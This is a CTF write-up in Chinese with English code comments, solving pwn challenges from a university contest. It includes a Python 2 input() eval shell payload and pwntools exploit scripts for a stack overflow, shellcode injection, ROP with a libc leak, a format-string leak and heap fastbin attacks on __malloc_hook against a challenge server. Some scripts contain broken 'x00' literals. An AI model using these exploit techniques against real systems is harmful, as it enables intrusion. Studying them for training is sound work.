国庆在家摸鱼,听到同学说有这个海南大学举办的比赛,于是就来随便玩了玩 摸鱼日记
总体难度并不大,pwn题的考点都比较基础和常规,可以作为一个基础知识的回顾与熟悉
Writeup
pwn
calculator
漏洞点:使用了python2中的input函数(它会对输入直接求值),导致了任意代码执行
payload:
__import__('os').system("/bin/sh")
即可get shell
warmup
题目需要输入一个int型数据使得abs(v4)<0
我们只需输入最小的int值即可get shell(abs取负时发生溢出,结果仍为负数):输入-2^31,即-2147483648
backdoor
简单的栈溢出,有后门,直接溢出到后门函数即可
exp:
from pwn import *
# Connect to the challenge service (CTF infrastructure named in the writeup).
# Python 2 script: str payloads are concatenated with p64() output below.
p= remote('39.107.127.44',10002)
p.recvuntil('name:')
# Address of the "backdoor" function in the binary, used as an absolute
# address (so no PIE is assumed).
backdoor = 0x400697
# 0xA bytes fill the buffer, 8 more cover what is presumably the saved frame
# pointer, then the saved return address is replaced with the backdoor address.
# A stack canary would abort before the return and PIE would make the fixed
# address unusable; the writeup says neither stands in the way here.
payload = 'a'*0xA+'a'*8+p64(backdoor)
p.send(payload)
p.interactive()
pwnme
没有开NX,有RWX的段并且可以往bss段上写数据,在bss段上写入shellcode,然后栈溢出返回地址到shellcode处即可
exp:
from pwn import*
p = remote('39.107.127.44',10006)
#p=process('./pwnme')
# Loaded but not used anywhere below.
elf=ELF('./pwnme')
context(os='linux',arch='amd64',log_level='debug')
# Machine code for a shell-spawning stub, assembled for amd64.
shellcode = asm(shellcraft.sh())
p.recvuntil('Name:')
# The name buffer lives in .bss, which the writeup says is RWX (NX disabled),
# so whatever is written here is later executable.
p.send(shellcode)
# 40 bytes reach the saved return address, which is pointed at the .bss buffer
# (0x601080, absolute: no PIE assumed). NX alone would stop this step: with a
# non-executable .bss the return would fault instead of running the stub.
payload='a'*40+p64(0x601080)
p.recvuntil('Try your best:')
p.sendline(payload)
p.interactive()
babyrop
通过puts泄露libc基址,然后rop打one_gadget
exp:
from pwn import*
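# Local harness left commented out, matching the other scripts in this writeup:
# the original spawned ./babyrop and then immediately rebound `p` to the remote
# connection, leaving an unused child process running.
#p = process('./babyrop')
#ip = '39.107.127.44'
#port ='10001'
p = remote('39.107.127.44',10001)
elf = ELF('./babyrop')
# libc build shipped with the challenge; used for the puts symbol offset.
libc = ELF('./libc-2.23-64.so')
# Address of main(), returned to after the leak so the overflow can be hit
# a second time (absolute address: no PIE assumed).
main = 0x400617
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
# `pop rdi; ret` gadget address in the binary, as given in the writeup.
pop_rdi = 0x4006d3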
p.recvuntil('Your input :')
# Stage 1: 0x28 bytes of padding reach the saved return address, then a short
# ROP chain: pop rdi <- puts@GOT ; call puts@PLT ; return to main. puts prints
# its own resolved address, which discloses where libc is mapped (this is what
# defeats ASLR; a stack canary would have aborted before the first return).
payload = 'a'*0x28+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main)
p.send(payload)
# Read the 6 significant bytes of the 64-bit address and zero-extend.
# NOTE: as written, 'x00' is a 3-character fill string, so ljust() raises
# TypeError; presumably an extraction artifact for a NUL escape.
puts_add = u64(p.recv(6).ljust(8,'x00'))
libc_base = puts_add - libc.symbols['puts']
log.info('puts:'+hex(puts_add))
log.info('libc_base:'+hex(libc_base))
# 0xf0364: offset specific to ./libc-2.23-64.so, described in the writeup as a
# one_gadget address.
one = libc_base + 0xf0364
p.recvuntil('Your input :')
# Stage 2: the second overflow returns straight into that gadget.
payload = 'a'*0x28 + p64(one)
p.sendline(payload)
p.interactive()
echo
printf存在格式化字符串漏洞,flag被读到了栈上,利用格式化字符串将flag打印出来即可。
经过调试,得到flag在%27$p 到 %37$p 的位置上
每一项读出来十六进制转字符后逆序,最后全部拼接起来即可
exp:
from pwn import*
# Endpoint of the echo challenge (CTF infrastructure named in the writeup).
target = ('39.107.127.44', 10004)
p = remote(*target)
# Accumulates the flag text recovered one stack slot at a time.
flag = ""
def leak(index):
    """Read one stack slot through a positional format-string read.

    index: the `%N$p` parameter position to dump (the writeup found the
    flag in positions 27..37).
    Returns the low 4 bytes of the slot's little-endian encoding as a str.
    Uses the module-level connection `p`.
    """
    p.recvuntil('>')
    # Builds '%<index>$p'. The service hands user input to printf as the
    # format string (the bug the writeup describes); the fix on the server
    # side is a fixed format such as printf("%s", buf).
    payload = '%'+str(index)+'$'+'p'
    p.sendline(payload)
    # NOTE: this string literal is split across two lines in this copy of the
    # script (a line break inside the quotes); presumably it is the newline
    # that recvuntil waits for, which [:-1] then strips.
    answer = p.recvuntil('
    ')[:-1]
    # '%p' printed the slot in hex; turn it back into an integer ...
    b = int(answer,16)
    # ... and re-serialize little-endian, keeping the low 4 bytes. This is the
    # "convert to chars and reverse" step of the writeup. Presumably only
    # 4 bytes of each slot carry flag text -- verify against the dump.
    answer = p64(b)[:4]
    return answer
# Positions 27..37 inclusive (range end is exclusive), i.e. the %27$p..%37$p
# slots found while debugging; the pieces are joined in slot order.
flag = "".join(leak(slot) for slot in range(27, 38))
# Python 2 print statement -- the whole script is Python 2.
print flag
easyheap
存在UAF漏洞,利用unsorted bin泄露libc基址,然后fastbin attack 打 malloc hook
exp:
from pwn import *
#p = process('./easyheap')
# Challenge endpoint and the libc build shipped with it. The chain below relies
# on 2.23-era allocator behaviour: fastbins without tcache and a writable
# __malloc_hook (the hook was removed in glibc 2.34).
host, port = '39.107.127.44', 10003
p = remote(host, port)
libc = ELF('./libc-2.23.so')
#context.log_level='debug'
def add(id,size,content):
    """Menu option 1: allocate a chunk.

    Sends the menu choice, the slot id and the requested size as lines, then
    the raw content without a trailing newline. Uses the module-level
    connection ``p``.
    """
    line_prompts = (('Your choice :', '1'), ('id:', str(id)), ('size:', str(size)))
    for prompt, value in line_prompts:
        p.sendlineafter(prompt, value)
    p.sendafter('content:', content)
def edit(id,content):
    """Menu option 2: overwrite the content of slot ``id``.

    No size is sent for this service; the content is written raw (no trailing
    newline). Uses the module-level connection ``p``.
    """
    for prompt, value in (('Your choice :', '2'), ('id:', str(id))):
        p.sendlineafter(prompt, value)
    p.sendafter('content:', content)
def delete(id):
    """Menu option 3: free the chunk in slot ``id`` (module-level ``p``)."""
    choice, slot = '3', str(id)
    p.sendlineafter('Your choice :', choice)
    p.sendlineafter('id:', slot)
def show(id):
    """Menu option 4: print the content of slot ``id`` (module-level ``p``)."""
    choice, slot = '4', str(id)
    p.sendlineafter('Your choice :', choice)
    p.sendlineafter('id:', slot)
# --- Stage 1: leak a libc address through the use-after-free ---
# Two 0x90-byte chunks; the second presumably keeps the first from being merged
# into the top chunk when it is freed.
add(0,0x90,'aaaa')
add(1,0x90,'bbbb')
# Freed at this size the chunk goes to the unsorted bin, and glibc stores its
# fd/bk pointers (into main_arena) over the first 16 bytes of user data.
delete(0)
#gdb.attach(p)
# The service still prints the freed chunk: the UAF the writeup describes.
# Clearing the slot pointer on free would remove both this read and the
# later write.
show(0)
p.recvline()
# The stale fd is main_arena+88 in this libc build, hence the -88.
# NOTE: as written 'x00' is a 3-character fill, so ljust() raises TypeError;
# presumably an extraction artifact for a NUL escape.
main_arena = u64(p.recv(6).ljust(8,'x00')) - 88
# The script treats __malloc_hook as sitting 0x10 below main_arena.
libc_base = main_arena-0x10-libc.sym['__malloc_hook']
log.info('libc_base:%x',libc_base)
malloc_hook=libc_base+libc.sym['__malloc_hook']
# Fake chunk 0x23 before the hook: chosen so the bytes there pass as a
# fastbin-sized header for the 0x70 bin (the writeup shows no memory dump;
# verify in a debugger).
log.info('fake:0x%x',malloc_hook-0x23)
# 0x4527a: offset in ./libc-2.23.so, presumably a one_gadget address -- verify.
one = libc_base + 0x4527a
# --- Stage 2: fastbin dup through the UAF write ---
add(2,0x60,'cccc')
add(3,0x60,'dddd')
delete(2)
# Rewrite the freed chunk's fd so the fastbin now "contains" the fake chunk.
# glibc 2.32+ safe-linking would not accept this unmangled pointer.
edit(2,p64(malloc_hook-0x23))
add(4,0x60,'eeee')
# Served from the fake chunk; 0x13 padding bytes put the gadget address
# exactly over __malloc_hook.
add(5,0x60,'x00'*0x13+p64(one))
#gdb.attach(p)
# Any further malloc() now runs the hook; the requested size is irrelevant.
p.sendlineafter('Your choice :','1')
p.sendlineafter('id:',str(6))
p.sendlineafter('size:',str(0x10))
p.interactive()
babyheap
存在堆溢出漏洞,unsorted bin泄露地址,fastbin attack 打malloc hook
exp:
from pwn import *
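# Local harness left commented out, matching the other scripts in this writeup:
# the original spawned ./babyheap and then immediately rebound `p` to the remote
# connection, leaving an unused child process running.
#p = process('./babyheap')
p = remote('39.107.127.44',10000)
# libc build shipped with the challenge. The chain below relies on 2.23-era
# allocator behaviour: fastbins without tcache and a writable __malloc_hook.
libc = ELF('./libc-2.23.so')
#context.log_level='debug'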
def add(id,size,content):
    """Menu option 1: allocate a chunk of ``size`` bytes in slot ``id``.

    The choice, id and size are sent as lines; the content is sent raw.
    Uses the module-level connection ``p``.
    """
    line_prompts = (('Your choice :', '1'), ('id:', str(id)), ('size:', str(size)))
    for prompt, value in line_prompts:
        p.sendlineafter(prompt, value)
    p.sendafter('content:', content)
def edit(id,size,content):
    """Menu option 2: rewrite slot ``id`` with ``size`` bytes of ``content``.

    The service takes a size for the edit, independent of the allocation size;
    the writeup relies on it accepting a larger one. Uses the module-level
    connection ``p``.
    """
    line_prompts = (('Your choice :', '2'), ('id:', str(id)), ('size:', str(size)))
    for prompt, value in line_prompts:
        p.sendlineafter(prompt, value)
    p.sendafter('content:', content)
def delete(id):
    """Menu option 3: free the chunk in slot ``id`` (module-level ``p``)."""
    choice, slot = '3', str(id)
    p.sendlineafter('Your choice :', choice)
    p.sendlineafter('id:', slot)
def show(id):
    """Menu option 4: print the content of slot ``id`` (module-level ``p``)."""
    choice, slot = '4', str(id)
    p.sendlineafter('Your choice :', choice)
    p.sendlineafter('id:', slot)
# --- Stage 1: libc leak ---
add(0,0x90,'aaaa')
add(1,0x90,'bbbb')          # presumably keeps chunk 0 off the top chunk when freed
delete(0)                   # chunk 0 -> unsorted bin, fd/bk now point into libc
#gdb.attach(p)
# Carve a 0x60 chunk out of the freed one. The 8 bytes of 'c' cover the stale
# fd; the stale bk right after them is left in place and printed by show().
add(2,0x50,'c'*8)
#gdb.attach(p)
show(2)
p.recvuntil('c'*8)
# The stale bk apparently points at a small-bin head (the chunk was binned
# before being split); (0xc08 - 0xb78) and 88 are the author's debugger-derived
# offsets back to main_arena.
# NOTE: as written 'x00' is a 3-character fill, so ljust() raises TypeError;
# presumably an extraction artifact for a NUL escape.
main_arena = u64(p.recv(6).ljust(8,'x00')) - ( 0xc08 - 0xb78) -88
log.info('main_arena:%x',main_arena)
#gdb.attach(p)
# The script treats __malloc_hook as sitting 0x10 below main_arena.
malloc_hook = main_arena - 0x10
libc_base = main_arena - 0x10 -libc.sym['__malloc_hook']
# 0x4527a: offset in ./libc-2.23.so, presumably a one_gadget address -- verify.
one = libc_base + 0x4527a
# Fake chunk 0x23 before the hook: chosen so the bytes there pass as a
# fastbin-sized header for the 0x70 bin (verify in a debugger).
log.info('fake:0x%x',malloc_hook-0x23)
# --- Stage 2: heap overflow -> fastbin dup ---
add(3,0x60,'dddd')
add(4,0x60,'eeee')
add(5,0x60,'ffff')          # trailing chunk after the one that gets freed
delete(4)                   # chunk 4 -> 0x70 fastbin
#gdb.attach(p)
# Heap overflow: edit() takes a size larger than chunk 3's allocation, so the
# 0x80-byte write runs past chunk 3. 0x68 bytes of filler reach chunk 4's
# size field, which is kept at 0x71 so the fastbin size check still passes;
# the next 8 bytes replace chunk 4's fd with the fake chunk. The server-side
# fix is to bound the edit length by the slot's allocation size.
edit(3,0x80,'x00'*0x68+p64(0x71)+p64(malloc_hook-0x23))
add(6,0x60,'gggg')          # takes chunk 4 back out of the fastbin
# Served from the fake chunk; 0x13 padding bytes put the gadget address exactly
# over __malloc_hook (removed in glibc 2.34; 2.32+ safe-linking would also
# reject the unmangled fd written above).
add(7,0x60,'x00'*0x13+p64(one))
#gdb.attach(p)
# Any further malloc() now runs the hook; the requested size is irrelevant.
p.sendlineafter('Your choice :','1')
p.sendlineafter('id:',str(8))
p.sendlineafter('size:',str(0x10))
p.interactive()
hardheap
edit函数存在off-by-one漏洞,溢出1字节,先通过unsorted bin泄露libc地址
再通过off-by-one造成块堆叠,制造fastbin attack,打malloc hook
exp:
from pwn import *
#p = process('./hardheap')
# Challenge endpoint and the libc build shipped with it. The chain below relies
# on 2.23-era allocator behaviour: fastbins without tcache and a writable
# __malloc_hook (the hook was removed in glibc 2.34).
host, port = '39.107.127.44', 10005
p = remote(host, port)
libc = ELF('./libc-2.23.so')
#context.log_level='debug'
def add(id,size,content):
    """Menu option 1: allocate a chunk of ``size`` bytes in slot ``id``.

    The choice, id and size are sent as lines; the content is sent raw.
    Uses the module-level connection ``p``.
    """
    line_prompts = (('Your choice :', '1'), ('id:', str(id)), ('size:', str(size)))
    for prompt, value in line_prompts:
        p.sendlineafter(prompt, value)
    p.sendafter('content:', content)
def edit(id,content):
    """Menu option 2: overwrite the content of slot ``id``.

    No size is sent; the content is written raw (no trailing newline). The
    writeup says this service's edit writes one byte past the buffer.
    Uses the module-level connection ``p``.
    """
    for prompt, value in (('Your choice :', '2'), ('id:', str(id))):
        p.sendlineafter(prompt, value)
    p.sendafter('content:', content)
def delete(id):
    """Menu option 3: free the chunk in slot ``id`` (module-level ``p``)."""
    choice, slot = '3', str(id)
    p.sendlineafter('Your choice :', choice)
    p.sendlineafter('id:', slot)
def show(id):
    """Menu option 4: print the content of slot ``id`` (module-level ``p``)."""
    choice, slot = '4', str(id)
    p.sendlineafter('Your choice :', choice)
    p.sendlineafter('id:', slot)
# --- Stage 1: libc leak (same technique as the babyheap script) ---
add(0,0x90,'aaaa')
add(1,0x18,'bbbb')          # small neighbour; its edit() is the off-by-one write later
delete(0)                   # chunk 0 -> unsorted bin (chunk 1 presumably keeps it off top)
# Carve a 0x60 chunk out of the freed one: the 'c'*8 covers the stale fd, the
# stale bk right after it is printed by show().
add(2,0x50,'c'*8)
show(2)
p.recvuntil('c'*8)
# The stale bk apparently points at a small-bin head (the chunk was binned
# before being split); (0xc08 - 0xb78) and 88 are the author's debugger-derived
# offsets back to main_arena.
# NOTE: as written 'x00' is a 3-character fill, so ljust() raises TypeError;
# presumably an extraction artifact for a NUL escape.
main_arena = u64(p.recv(6).ljust(8,'x00')) - ( 0xc08 - 0xb78) -88
log.info('main_arena:0x%x',main_arena)
#gdb.attach(p)
# The script treats __malloc_hook as sitting 0x10 below main_arena.
malloc_hook = main_arena - 0x10
libc_base = main_arena - 0x10 -libc.sym['__malloc_hook']
log.info('fake:0x%x',malloc_hook-0x23)
# 0x4527a: offset in ./libc-2.23.so, presumably a one_gadget address -- verify.
one = libc_base + 0x4527a
# --- Stage 2: off-by-one -> overlapping chunks -> fastbin dup ---
add(3,0x30,'dddd')          # 0x40 request: exact fit for the remainder of chunk 0
add(4,0x18,'eeee')          # 0x20 chunk, by allocation order right after chunk 1
add(5,0x60,'ffff')          # 0x70 chunk after chunk 4
add(6,0x18,'gggg')          # presumably a guard so the later free does not merge with top
# The off-by-one: edit() writes one byte past chunk 1's 0x18 data bytes, which
# is the low byte of the following chunk's size field. That neighbour is
# chunk 4 (chunk 3 came from the old chunk-0 remainder), so 0x21 -> 0x91 makes
# chunk 4 appear to span chunk 5 as well. The server-side fix is to bound the
# write at `size` rather than `size + 1`; newer glibc's size/prev_size
# consistency checks catch some, not all, of this.
edit(1,'x00'*0x18+p8(0x91))
delete(4)                   # freed as a 0x90 chunk covering chunk 5 -> unsorted bin
add(7,0x80,'hhhh')          # 0x90 exact fit: chunk 7 now overlaps the live chunk 5
delete(5)                   # chunk 5 -> 0x70 fastbin
# Through the overlap, rewrite chunk 5's header: size stays 0x71 (passes the
# fastbin size check), fd becomes the fake chunk 0x23 before __malloc_hook
# (chosen so the bytes there pass as a fastbin-sized header; verify in a
# debugger). glibc 2.32+ safe-linking would not accept this unmangled fd.
edit(7,'x00'*0x18+p64(0x71)+p64(malloc_hook-0x23))
add(8,0x60,'iiii')          # takes chunk 5 back out of the fastbin
# Served from the fake chunk; 0x13 padding bytes put the gadget address exactly
# over __malloc_hook (the hook itself was removed in glibc 2.34).
add(9,0x60,'x00'*0x13+p64(one))
#gdb.attach(p)
# Any further malloc() now runs the hook; the requested size is irrelevant.
p.sendlineafter('Your choice :','1')
p.sendlineafter('id:',str(10))
p.sendlineafter('size:',str(0x10))
p.interactive()